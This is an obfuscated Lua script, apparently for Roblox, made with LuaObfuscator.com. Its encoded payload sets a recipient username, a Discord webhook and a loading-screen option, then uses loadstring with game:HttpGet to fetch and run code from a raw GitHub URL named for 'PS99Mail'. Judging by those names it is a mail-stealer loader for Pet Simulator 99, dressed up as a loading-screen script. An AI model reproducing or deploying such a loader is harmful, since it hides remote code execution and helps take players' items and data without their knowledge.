--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.21) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v66=v2(v0(v30,16));if v19 then local v73=v5(v66,v19);v19=nil;return v73;else return v66;end end end);local function v20(v31,v32,v33)if v33 then local v67=0;local v68;while true do if (v67==(117 -(32 + 85))) then v68=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((5 -3)^(((v33-((861 + 17) -(282 + 595))) -(v32-((1 + 0) -(957 -(892 + 65))))) + (2 -1))) ;return v68-(v68%(1 + 0)) ;end end else local v69=(621 -(555 + 64))^(v32-(1066 -(68 + 997))) ;return (((v31%(v69 + v69))>=v69) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;return (v36 * (472 -216)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + (7 -3) ;return (v40 * (16777566 -(64 + 23 + 263))) + (v39 * (65716 -(67 + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=(11 -8) -(444 -(416 + 26)) ;local v44=(v20(v42,953 -(802 + 150) ,20) * ((5 -3)^((181 -124) -25))) + v41 ;local v45=v20(v42,16 + 5 ,1028 -(915 + 82) );local v46=((v20(v42,32)==(2 -1)) and  -(1 + 0 + 0)) or (1 -0) ;if (v45==(1187 -(1069 + 118))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else v45=1;v43=0;end elseif (v45==((629 -273) + 1691)) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/0))) or (v46 * NaN) ;end return v8(v46,v45-(1814 -(368 + 423)) ) * (v43 + (v44/((6 -(442 -(145 + 293)))^(70 -(10 + 8))))) ;end local function v25(v47)local v48=0;local v49;local v50;while true do if (v48==3) then return v6(v50);end if (v48==(430 -(44 + 386))) then v49=nil;if  not v47 then local v90=1486 -((2458 -1460) + 488) ;while true do if (v90==(0 + 0)) then v47=v23();if (v47==(0 + 0)) then return "";end break;end end end v48=773 -(201 + 31 + 540) ;end if (v48==(1140 -(116 + 1022))) then v50={};for v74=4 -3 , #v49 do v50[v74]=v2(v1(v3(v49,v74,v74)));end v48=2 + 1 ;end if (v48==(3 -2)) then v49=v3(v16,v18,(v18 + v47) -((2 + 1) -2) );v18=v18 + v47 ;v48=861 -(814 + 45) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v65=0 + 0 ;while true do if (v65==0) then if (v51==3) then for v96=1,v23() do v53[v96-1 ]=v28();end return v55;end if ((0 -0)==v51) then v52={};v53={};v54={};v51=1 -0 ;end v65=2 -1 ;end if (v65~=(1 + 0)) then else if (v51==2) then local v94=0 + 0 ;while true do if (v94~=1) then else for v103=1,v23() do local v104=396 -(115 + 281) ;local v105;local v106;while true do if (v104~=1) then else while true do if (0==v105) then v106=v21();if (v20(v106,2 -1 ,1)~=0) then else local v161=0 + 0 ;local v162;local v163;local v164;local v165;local v166;while true do if (v161~=(2 -1)) then else v164=nil;v165=nil;v161=7 -5 ;end if (v161~=(867 -(550 + 317))) then else v162=0 -0 ;v163=nil;v161=1;end if (2==v161) then v166=nil;while true do if (v162~=(1 -0)) then else local v173=0 -0 ;local v174;while true do if (v173==0) then v174=285 -(134 + 151) ;while true do if (v174==(1665 -(970 + 695))) then v165=nil;v166=nil;v174=1 -0 ;end if (1~=v174) then else v162=1992 -(582 + 1408) ;break;end end break;end end end if (0==v162) then local v175=0 -0 ;local v176;while true do if (v175==(0 -0)) then v176=0 -0 ;while true do if ((1825 -(1195 + 629))~=v176) then else v162=1;break;end if (v176==0) then v163=0;v164=nil;v176=1 -0 ;end end break;end end end if (v162~=2) then else while true do if (2==v163) then local v177=241 -(187 + 54) ;while true do if (v177~=(781 -(162 + 618))) then else v163=3 + 0 ;break;end if (v177==0) then local v185=0;while true do if (v185==0) then if (v20(v165,1,1 + 0 )~=(1 -0)) then else v166[2]=v57[v166[2]];end if (v20(v165,2,2 -0 )~=(1 + 0)) then else v166[1639 -(1373 + 263) ]=v57[v166[3]];end v185=1001 -(451 + 549) ;end if (v185==1) then v177=1;break;end end end end end if (v163~=3) then else if (v20(v165,1 + 2 ,4 -1 )~=1) then else v166[6 -2 ]=v57[v166[4]];end v52[v103]=v166;break;end if (v163~=0) then else local v179=1384 -(746 + 638) ;local v180;local v181;while true do if (v179~=(0 + 0)) then else v180=0 -0 ;v181=nil;v179=1;end if (v179==(342 -(218 + 123))) then while true do if ((1581 -(1535 + 46))==v180) then v181=0 + 0 ;while true do if (v181~=1) then else v163=1 + 0 ;break;end if (v181~=(560 -(306 + 254))) then else v164=v20(v106,2,1 + 2 );v165=v20(v106,7 -3 ,1473 -(899 + 568) );v181=1 + 0 ;end end break;end end break;end end end if (v163~=1) then else local v182=0 -0 ;while true do if (v182==(603 -(268 + 335))) then v166={v22(),v22(),nil,nil};if (v164==0) then local v186=1456 -(282 + 1174) ;local v187;while true do if (v186==(811 -(569 + 242))) then v187=0 -0 ;while true do if (v187~=(0 + 0)) then else v166[1027 -(706 + 318) ]=v22();v166[4]=v22();break;end end break;end end elseif (v164==(1252 -(721 + 530))) then v166[1274 -(945 + 326) ]=v23();elseif (v164==2) then v166[7 -4 ]=v23() -((2 + 0)^16) ;elseif (v164~=(703 -(271 + 429))) then else local v196=0;local v197;local v198;local v199;while true do if (v196~=(1 + 0)) then else v199=nil;while true do if (v197~=0) then else v198=1500 -(1408 + 92) ;v199=nil;v197=1;end if (v197~=(1087 -(461 + 625))) then else while true do if (v198~=(1288 -(993 + 295))) then else v199=0;while true do if (v199==0) then v166[1 + 2 ]=v23() -(2^(1187 -(418 + 753))) ;v166[2 + 2 ]=v22();break;end end break;end end break;end end break;end if ((0 + 0)==v196) then v197=0;v198=nil;v196=1;end end end v182=1;end if (1~=v182) then else v163=1 + 1 ;break;end end end end break;end end break;end end end break;end end break;end if (v104~=(0 + 0)) then else v105=0;v106=nil;v104=1;end end end v51=3;break;end if (0==v94) then for v107=530 -(406 + 123) ,v56 do local v108=0;local v109;local v110;local v111;while true do if (v108==0) then v109=1769 -(1749 + 20) ;v110=nil;v108=1 + 0 ;end if ((1323 -(1249 + 73))==v108) then v111=nil;while true do if (v109==(0 + 0)) then local v151=1145 -(466 + 679) ;local v152;while true do if (v151==0) then v152=0 -0 ;while true do if (v152==(2 -1)) then v109=1;break;end if ((1900 -(106 + 1794))~=v152) then else local v170=0;while true do if (v170~=(1 + 0)) then else v152=1;break;end if (v170==0) then v110=v21();v111=nil;v170=1;end end end end break;end end end if ((1 + 0)~=v109) then else if (v110==(2 -1)) then v111=v21()~=0 ;elseif (v110==2) then v111=v24();elseif (v110==3) then v111=v25();end v57[v107]=v111;break;end end break;end end end v55[7 -4 ]=v21();v94=1;end end end if (v51~=1) then else local v95=114 -(4 + 110) ;while true do if (v95~=(585 -(57 + 527))) then else v57={};v51=2;break;end if (v95~=(1427 -(41 + 1386))) then else v55={v52,v53,nil,v54};v56=v23();v95=104 -(17 + 86) ;end end end break;end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (1==v61) then v64=v58[3];return function(...)local v76=v62;local v77=v63;local v78=v64;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v91=0,v84 do if (v91>=v78) then v82[v91-v78 ]=v83[v91 + 1 ];else v86[v91]=v83[v91 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=10) then if (v89<=4) then if (v89<=1) then if (v89>0) then v60[v88[3]]=v86[v88[2]];else do return;end end elseif (v89<=2) then v80=v88[3];elseif (v89>3) then do return;end else local v124=v88[2];local v125,v126=v79(v86[v124](v13(v86,v124 + 1 ,v88[3])));v81=(v126 + v124) -1 ;local v127=0;for v154=v124,v81 do v127=v127 + 1 ;v86[v154]=v125[v127];end end elseif (v89<=7) then if (v89<=5) then v86[v88[2]]=v88[3];elseif (v89>6) then local v128=v88[2];local v129=v86[v88[3]];v86[v128 + 1 ]=v129;v86[v128]=v129[v88[4]];elseif (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end elseif (v89<=8) then local v117=v88[2];local v118=v86[v88[3]];v86[v117 + 1 ]=v118;v86[v117]=v118[v88[4]];elseif (v89>9) then v86[v88[2]]();else local v133=v88[2];v86[v133]=v86[v133](v13(v86,v133 + 1 ,v81));end elseif (v89<=15) then if (v89<=12) then if (v89==11) then if ((v88[3]=="_ENV") or (v88[3]=="getfenv")) then v86[v88[2]]=v60;else v86[v88[2]]=v60[v88[3]];end elseif (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end elseif (v89<=13) then v86[v88[2]]=v88[3]~=0 ;elseif (v89==14) then if ((v88[3]=="_ENV") or (v88[3]=="getfenv")) then v86[v88[2]]=v60;else v86[v88[2]]=v60[v88[3]];end else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==1) then v81=(v142 + v140) -1 ;v143=0;v139=2;end if (2==v139) then for v168=v140,v81 do local v169=0;while true do if (v169==0) then v143=v143 + 1 ;v86[v168]=v141[v143];break;end end end break;end if (v139==0) then v140=v88[2];v141,v142=v79(v86[v140](v13(v86,v140 + 1 ,v88[3])));v139=1;end end end elseif (v89<=18) then if (v89<=16) then v80=v88[3];elseif (v89==17) then v60[v88[3]]=v86[v88[2]];else v86[v88[2]]=v88[3];end elseif (v89<=19) then v86[v88[2]]();elseif (v89==20) then v86[v88[2]]=v88[3]~=0 ;else local v149=v88[2];v86[v149]=v86[v149](v13(v86,v149 + 1 ,v81));end v80=v80 + 1 ;end end;end if (0==v61) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O00028O0003083O00557365726E616D6503073O0050756C626F313203073O00576562682O6F6B03213O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F026O00F03F03153O0073656C65637465644C6F6164696E675363722O656E03013O0034030D3O004C6F6164696E675363722O656E027O0040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269001B3O0012053O00013O0026063O0008000100010004023O00080001001205000100033O001201000100023O001205000100053O001201000100043O0012053O00063O0026063O000F000100060004023O000F0001001205000100083O001201000100074O000D000100013O001201000100093O0012053O000A3O0026063O00010001000A0004023O0001000100120E0001000B3O00120E0002000C3O00200700020002000D0012050004000E4O000F000200044O000900013O00022O00130001000100010004023O001A00010004023O000100016O00017O00",v9(),...)
